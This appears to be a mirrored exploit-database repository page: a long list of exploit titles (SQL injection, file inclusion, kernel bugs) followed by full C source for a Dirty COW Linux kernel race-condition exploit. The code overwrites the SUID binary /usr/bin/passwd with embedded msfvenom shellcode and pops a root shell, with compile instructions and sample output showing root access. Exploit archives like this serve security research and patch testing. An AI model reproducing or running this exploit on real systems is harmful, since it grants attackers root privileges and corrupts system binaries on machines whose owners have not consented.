a5cd225af0
7 new exploits Xitami Web Server 5.0a0 - Denial of Service Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation (Write Access) Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' '/proc/self/mem' Race Condition Privilege Escalation Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition PoC (Write Access) Linux Kernel 2.6.22 < 3.9 (x86/x64) - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (SUID) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition PoC (Write Access) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' 'PTRACE_POKEDATA' Race Condition Privilege Escalation Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd) Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd) WinPower 4.9.0.4 - Privilege Escalation Internet PhotoShow (page) - Remote File Inclusion Internet PhotoShow 1.3 - 'page' Parameter Remote File Inclusion EQdkp 1.3.0 - (dbal.php) Remote File Inclusion EQdkp 1.3.0 - 'dbal.php' Remote File Inclusion CaLogic Calendars 1.2.2 - (CLPath) Remote File Inclusion CaLogic Calendars 1.2.2 - 'CLPath' Remote File Inclusion MercuryBoard 1.1.4 - (User-Agent) SQL Injection MercuryBoard 1.1.4 - 'User-Agent' SQL Injection EQdkp 1.3.1 - (Referer Spoof) Remote Database Backup EQdkp 1.3.1 - 'Referer Spoof' Remote Database Backup Web Slider 0.6 - (path) Remote File Inclusion Web Slider 0.6 - 'path' Parameter Remote File Inclusion Zomplog 3.8 - (mp3playlist.php speler) SQL Injection Zomplog 3.8 - 'mp3playlist.php' SQL Injection EQdkp 1.3.2 - (listmembers.php rank) SQL Injection EQdkp 1.3.2 - 'listmembers.php' SQL Injection CKGold Shopping Cart 2.0 - (category.php) Blind SQL Injection CKGold Shopping Cart 2.0 - 'category.php' Blind SQL Injection ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection ActiveKB KnowledgeBase 2.x - 'catId' Parameter SQL Injection Zomplog 3.8.1 - upload_files.php Arbitrary File Upload Zomplog 3.8.1 - Arbitrary File Upload CMS Made Simple 1.2.2 - (TinyMCE module) SQL Injection CMS Made Simple 1.2.2 Module TinyMCE - SQL Injection Mega File Hosting Script 1.2 - (fid) SQL Injection Mega File Hosting Script 1.2 - 'fid' Parameter SQL Injection CMS Made Simple 1.2.4 - (FileManager module) Arbitrary File Upload CMS Made Simple 1.2.4 Module FileManager - Arbitrary File Upload AJ HYIP ACME - 'topic_detail.php id' SQL Injection EQDKP 1.3.2f - (user_id) Authentication Bypass (PoC) e107 Plugin BLOG Engine 2.2 - (rid) Blind SQL Injection AJ HYIP ACME - 'topic_detail.php' SQL Injection EQdkp 1.3.2f - 'user_id' Authentication Bypass (PoC) e107 Plugin BLOG Engine 2.2 - 'rid' Parameter Blind SQL Injection CaLogic Calendars 1.2.2 - (langsel) SQL Injection CaLogic Calendars 1.2.2 - 'langsel' Parameter SQL Injection EMO Realty Manager - 'news.php ida' SQL Injection The Real Estate Script - 'dpage.php docID' SQL Injection Linkspile - 'link.php cat_id' SQL Injection Freelance Auction Script 1.0 - (browseproject.php) SQL Injection EMO Realty Manager - 'ida' Parameter SQL Injection The Real Estate Script - 'docID' Parameter SQL Injection Linkspile - 'cat_id' Parameter SQL Injection Freelance Auction Script 1.0 - 'browseproject.php' SQL Injection rgboard 3.0.12 - (Remote File Inclusioni / Cross-Site Scripting) Multiple Vulnerabilities Kostenloses Linkmanagementscript - (page_to_include) Remote File Inclusion rgboard 3.0.12 - Remote File Inclusioni / Cross-Site Scripting Kostenloses Linkmanagementscript - Remote File Inclusion newsmanager 2.0 - (Remote File Inclusion / File Disclosure / SQL Injection / pb) Multiple Vulnerabilities 68 Classifieds 4.0 - (category.php cat) SQL Injection newsmanager 2.0 - Remote File Inclusion / File Disclosure / SQL Injection 68 Classifieds 4.0 - 'category.php' SQL Injection StanWeb.CMS - (default.asp id) SQL Injection StanWeb.CMS - SQL Injection Archangel Weblog 0.90.02 - (post_id) SQL Injection Archangel Weblog 0.90.02 - 'post_id' Parameter SQL Injection WR-Meeting 1.0 - (msnum) Local File Disclosure WR-Meeting 1.0 - 'msnum' Parameter Local File Disclosure FicHive 1.0 - (category) Blind SQL Injection Smeego 1.0 - (Cookie lang) Local File Inclusion FicHive 1.0 - 'category' Parameter Blind SQL Injection Smeego 1.0 - 'Cookie lang' Local File Inclusion TAGWORX.CMS - Multiple SQL Injections TAGWORX.CMS 3.00.02 - Multiple SQL Injections lulieblog 1.2 - Multiple Vulnerabilities AlkalinePHP 0.77.35 - (adduser.php) Arbitrary Add Admin easycms 0.4.2 - Multiple Vulnerabilities Lulieblog 1.2 - Multiple Vulnerabilities AlkalinePHP 0.77.35 - 'adduser.php' Arbitrary Add Admin Easycms 0.4.2 - Multiple Vulnerabilities AlkalinePHP 0.80.00 Beta - (thread.php id) SQL Injection AlkalinePHP 0.80.00 Beta - 'thread.php' SQL Injection EntertainmentScript - 'play.php id' SQL Injection EntertainmentScript 1.4.0 - 'play.php' SQL Injection ecms 0.4.2 - (SQL Injection / Security Bypass) Multiple Vulnerabilities Mantis Bug Tracker 1.1.1 - (Code Execution / Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities ComicShout 2.5 - (index.php comic_id) SQL Injection eCMS 0.4.2 - SQL Injection / Security Bypass Mantis Bug Tracker 1.1.1 - Code Execution / Cross-Site Scripting / Cross-Site Request Forgery ComicShout 2.5 - 'comic_id' Parameter SQL Injection PHP Jokesite 2.0 - 'cat_id' SQL Injection Netious CMS 0.4 - (index.php pageid) SQL Injection PHP Jokesite 2.0 - 'cat_id' Parameter SQL Injection Netious CMS 0.4 - 'pageid' Parameter SQL Injection 6rbScript - 'news.php newsid' SQL Injection webl?sninger 4 - (Cross-Site Scripting / SQL Injection) Multiple Vulnerabilities 6rbScript - 'news.php' SQL Injection Weblosninger 4 - Cross-Site Scripting / SQL Injection e107 Plugin BLOG Engine 2.2 - 'uid' Blind SQL Injection Quate CMS 0.3.4 - (Remote File Inclusion / Local File Inclusion / Cross-Site Scripting / dt) Multiple Vulnerabilities e107 Plugin BLOG Engine 2.2 - 'uid' Parameter Blind SQL Injection Quate CMS 0.3.4 - Multiple Vulnerabilities RoomPHPlanning 1.5 - (idresa) SQL Injection PHPRaider 1.0.7 - (PHPbb3.functions.php) Remote File Inclusion RoomPHPlanning 1.5 - 'idresa' Parameter SQL Injection PHPRaider 1.0.7 - 'PHPbb3.functions.php' Remote File Inclusion CMS MAXSITE 1.10 - (category) SQL Injection CMS MAXSITE 1.10 - 'category' Parameter SQL Injection CKGold Shopping Cart 2.5 - (category_id) SQL Injection CKGold Shopping Cart 2.5 - 'category_id' Parameter SQL Injection ComicShout 2.8 - (news.php news_id) SQL Injection ComicShout 2.8 - 'news_id' Parameter SQL Injection AJ HYIP ACME - 'news.php id' SQL Injection AJ HYIP ACME - 'news.php' SQL Injection Quate CMS 0.3.4 - (Local File Inclusion / Cross-Site Scripting) Multiple Vulnerabilities Quate CMS 0.3.4 - Local File Inclusion / Cross-Site Scripting e107 Plugin BLOG Engine 2.2 - 'uid' SQL Injection e107 Plugin BLOG Engine 2.2 - 'uid' Parameter SQL Injection AJ HYIP ACME - 'comment.php artid' SQL Injection AJ HYIP ACME - 'readarticle.php artid' SQL Injection AJ HYIP ACME - 'comment.php' SQL Injection AJ HYIP ACME - 'readarticle.php' SQL Injection 6rbScript 3.3 - 'singerid' SQL Injection 6rbScript 3.3 - 'singerid' Parameter SQL Injection 6rbScript 3.3 - (section.php name) Local File Inclusion 6rbScript 3.3 - 'section.php' Local File Inclusion RoomPHPlanning 1.6 - (userform.php) Create Admin User Exploit RoomPHPlanning 1.6 - 'userform.php' Create Admin User Mega File Hosting Script 1.2 - (cross.php url) Remote File Inclusion Mega File Hosting Script 1.2 - 'url' Parameter Remote File Inclusion Advanced Image Hosting (AIH) 2.3 - (gal) Blind SQL Injection Advanced Image Hosting (AIH) 2.3 - 'gal' Parameter Blind SQL Injection ActiveKB KnowledgeBase - 'loadpanel.php Panel' Local File Inclusion ActiveKB KnowledgeBase - 'Panel' Parameter Local File Inclusion Quate CMS 0.3.5 - (Remote File Inclusioni / Local File Inclusion) Multiple Vulnerabilities Quate CMS 0.3.5 - Remote File Inclusion / Local File Inclusion Zomplog CMS 3.9 - Multiple Cross-Site Scripting / Cross-Site Request Forgery Vulnerabilities Zomplog 3.9 - Cross-Site Scripting / Cross-Site Request Forgery YABSoft Advanced Image Hosting Script - SQL Injection Advanced Image Hosting Script - SQL Injection MercuryBoard 1.1 - index.php SQL Injection MercuryBoard 1.1 - 'index.php' SQL Injection CMS Made Simple 0.10 - Lang.php Remote File Inclusion CMS Made Simple 0.10 - 'Lang.php' Remote File Inclusion Zomplog 3.3/3.4 - detail.php HTML Injection Zomplog 3.3/3.4 - 'detail.php' HTML Injection CMS Made Simple 1.0.2 - SearchInput Cross-Site Scripting CMS Made Simple 1.0.2 - 'SearchInput' Parameter Cross-Site Scripting EQDKP 1.3.1 - Show Variable Cross-Site Scripting EQdkp 1.3.1 - Cross-Site Scripting CMS Made Simple 105 - Stylesheet.php SQL Injection CMS Made Simple 1.0.5 - 'Stylesheet.php' SQL Injection Internet PhotoShow - 'login_admin' Parameter Unauthorized Access 68 Classifieds 4.1 - 'login.php' goto Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'login.php' Cross-Site Scripting 68 Classifieds 4.1 - category.php cat Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'category.php' Cross-Site Scripting 68 Classifieds 4.1 - searchresults.php page Parameter Cross-Site Scripting 68 Classifieds 4.1 - toplistings.php page Parameter Cross-Site Scripting 68 Classifieds 4.1 - viewlisting.php view Parameter Cross-Site Scripting 68 Classifieds 4.1 - viewmember.php member Parameter Cross-Site Scripting 68 Classifieds 4.1 - 'searchresults.php' Cross-Site Scripting 68 Classifieds 4.1 - 'toplistings.php' Cross-Site Scripting 68 Classifieds 4.1 - 'viewlisting.php' Cross-Site Scripting 68 Classifieds 4.1 - 'viewmember.php' Cross-Site Scripting YABSoft Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting Advanced Image Hosting Script 2.x - 'search.php' Cross-Site Scripting CMS Made Simple Download Manager 1.4.1 Module - Arbitrary File Upload CMS Made Simple Module Download Manager 1.4.1 - Arbitrary File Upload CMS Made Simple Antz Toolkit 1.02 Module - Arbitrary File Upload CMS Made Simple Module Antz Toolkit 1.02 - Arbitrary File Upload Zomplog 3.9 - 'message' Parameter Multiple Cross-Site Scripting Vulnerabilities Zomplog 3.9 - 'message' Parameter Cross-Site Scripting YABSoft Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting Advanced Image Hosting Script 2.3 - 'report.php' Cross-Site Scripting Wordpress Plugin WP Vault 0.8.6.6 - Local File Inclusion Joomla! Component Catalog 1.0.7 - SQL Injection Joomla! Component Portfolio Gallery 1.0.6 - SQL Injection Xfinity Gateway - Cross-Site Request Forgery
159 lines
4.8 KiB
C
Executable file
159 lines
4.8 KiB
C
Executable file
/*
|
|
*
|
|
* EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable.
|
|
*
|
|
* (un)comment correct payload first (x86 or x64)!
|
|
*
|
|
* $ gcc cowroot.c -o cowroot -pthread
|
|
* $ ./cowroot
|
|
* DirtyCow root privilege escalation
|
|
* Backing up /usr/bin/passwd.. to /tmp/bak
|
|
* Size of binary: 57048
|
|
* Racing, this may take a while..
|
|
* /usr/bin/passwd is overwritten
|
|
* Popping root shell.
|
|
* Don't forget to restore /tmp/bak
|
|
* thread stopped
|
|
* thread stopped
|
|
* root@box:/root/cow# id
|
|
* uid=0(root) gid=1000(foo) groups=1000(foo)
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <sys/mman.h>
|
|
#include <fcntl.h>
|
|
#include <pthread.h>
|
|
#include <string.h>
|
|
#include <unistd.h>
|
|
|
|
void *map;
|
|
int f;
|
|
int stop = 0;
|
|
struct stat st;
|
|
char *name;
|
|
pthread_t pth1,pth2,pth3;
|
|
|
|
// change if no permissions to read
|
|
char suid_binary[] = "/usr/bin/passwd";
|
|
|
|
/*
|
|
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
|
|
*/
|
|
unsigned char sc[] = {
|
|
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
|
|
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
|
|
0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
|
|
0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
|
|
0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
|
|
0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
|
|
};
|
|
unsigned int sc_len = 177;
|
|
|
|
/*
|
|
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
|
|
unsigned char sc[] = {
|
|
0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
|
|
0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
|
|
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
|
|
0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
|
|
0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
|
|
0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
|
|
0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
|
|
0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
|
|
0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
|
|
0x89, 0xe1, 0xcd, 0x80
|
|
};
|
|
unsigned int sc_len = 136;
|
|
*/
|
|
|
|
void *madviseThread(void *arg)
|
|
{
|
|
char *str;
|
|
str=(char*)arg;
|
|
int i,c=0;
|
|
for(i=0;i<1000000 && !stop;i++) {
|
|
c+=madvise(map,100,MADV_DONTNEED);
|
|
}
|
|
printf("thread stopped\n");
|
|
}
|
|
|
|
void *procselfmemThread(void *arg)
|
|
{
|
|
char *str;
|
|
str=(char*)arg;
|
|
int f=open("/proc/self/mem",O_RDWR);
|
|
int i,c=0;
|
|
for(i=0;i<1000000 && !stop;i++) {
|
|
lseek(f,map,SEEK_SET);
|
|
c+=write(f, str, sc_len);
|
|
}
|
|
printf("thread stopped\n");
|
|
}
|
|
|
|
void *waitForWrite(void *arg) {
|
|
char buf[sc_len];
|
|
|
|
for(;;) {
|
|
FILE *fp = fopen(suid_binary, "rb");
|
|
|
|
fread(buf, sc_len, 1, fp);
|
|
|
|
if(memcmp(buf, sc, sc_len) == 0) {
|
|
printf("%s is overwritten\n", suid_binary);
|
|
break;
|
|
}
|
|
|
|
fclose(fp);
|
|
sleep(1);
|
|
}
|
|
|
|
stop = 1;
|
|
|
|
printf("Popping root shell.\n");
|
|
printf("Don't forget to restore /tmp/bak\n");
|
|
|
|
system(suid_binary);
|
|
}
|
|
|
|
int main(int argc,char *argv[]) {
|
|
char *backup;
|
|
|
|
printf("DirtyCow root privilege escalation\n");
|
|
printf("Backing up %s.. to /tmp/bak\n", suid_binary);
|
|
|
|
asprintf(&backup, "cp %s /tmp/bak", suid_binary);
|
|
system(backup);
|
|
|
|
f = open(suid_binary,O_RDONLY);
|
|
fstat(f,&st);
|
|
|
|
printf("Size of binary: %d\n", st.st_size);
|
|
|
|
char payload[st.st_size];
|
|
memset(payload, 0x90, st.st_size);
|
|
memcpy(payload, sc, sc_len+1);
|
|
|
|
map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
|
|
|
|
printf("Racing, this may take a while..\n");
|
|
|
|
pthread_create(&pth1, NULL, &madviseThread, suid_binary);
|
|
pthread_create(&pth2, NULL, &procselfmemThread, payload);
|
|
pthread_create(&pth3, NULL, &waitForWrite, NULL);
|
|
|
|
pthread_join(pth3, NULL);
|
|
|
|
return 0;
|
|
}
|